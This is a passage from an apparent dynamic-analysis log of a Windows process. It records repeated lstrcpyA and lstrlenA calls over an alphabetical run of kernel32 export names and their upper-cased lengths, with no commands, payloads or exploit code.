(lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0082.529] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0082.529] lstrlenA (lpString="BACKUPREAD") returned 10 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0082.529] lstrlenA (lpString="BACKUPSEEK") returned 10 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0082.529] lstrlenA (lpString="BACKUPWRITE") returned 11 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0082.529] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0082.529] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0082.529] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0082.529] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0082.529] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0082.529] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0082.529] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0082.529] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0082.530] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0082.530] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0082.530] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0082.530] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0082.530] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0082.530] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0082.530] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0082.530] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0082.530] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0082.530] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0082.530] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0082.530] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0082.530] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0082.530] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0082.530] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0082.530] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0082.530] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0082.530] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0082.530] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0082.531] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0082.531] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0082.531] lstrlenA (lpString="BEEP") returned 4 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0082.531] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0082.531] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0082.531] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0082.531] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0082.531] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0082.531] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0082.531] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0082.531] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0082.531] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0082.531] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0082.531] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0082.531] lstrlenA (lpString="CANCELIO") returned 8 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0082.531] lstrlenA (lpString="CANCELIOEX") returned 10 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0082.531] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0082.531] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0082.531] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0082.532] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0082.532] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0082.532] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0082.532] lstrlenA (lpString="CHECKELEVATION") returned 14 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0082.532] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0082.532] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0082.532] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0082.532] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0082.532] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0082.532] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0082.532] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0082.532] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0082.532] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0082.532] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0082.532] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0082.532] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0082.532] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0082.532] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0082.532] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0082.533] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0082.533] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0082.533] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0082.533] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0082.533] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0082.533] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0082.533] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0082.533] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0082.533] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0082.533] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0082.533] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0082.533] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0082.533] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0082.533] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0082.533] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0082.533] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0082.533] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0082.533] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0082.533] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0082.533] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0082.534] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0082.534] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0082.534] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0082.534] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0082.534] lstrlenA (lpString="COPYCONTEXT") returned 11 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0082.534] lstrlenA (lpString="COPYFILEA") returned 9 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0082.534] lstrlenA (lpString="COPYFILEEXA") returned 11 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0082.534] lstrlenA (lpString="COPYFILEEXW") returned 11 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0082.534] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0082.534] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0082.534] lstrlenA (lpString="COPYFILEW") returned 9 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0082.534] lstrlenA (lpString="COPYLZFILE") returned 10 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0082.534] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0082.534] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0082.534] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0082.534] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0082.534] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0082.534] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0082.534] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0082.535] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0082.535] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0082.535] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0082.535] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0082.535] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0082.535] lstrlenA (lpString="CREATEEVENTA") returned 12 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0082.535] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0082.535] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0082.535] lstrlenA (lpString="CREATEEVENTW") returned 12 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0082.535] lstrlenA (lpString="CREATEFIBER") returned 11 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0082.535] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0082.535] lstrlenA (lpString="CREATEFILEA") returned 11 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0082.535] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0082.535] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0082.535] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0082.535] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0082.535] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0082.535] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0082.535] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0082.535] lstrlenA (lpString="CREATEFILEW") returned 11 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0082.536] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0082.536] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0082.536] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" 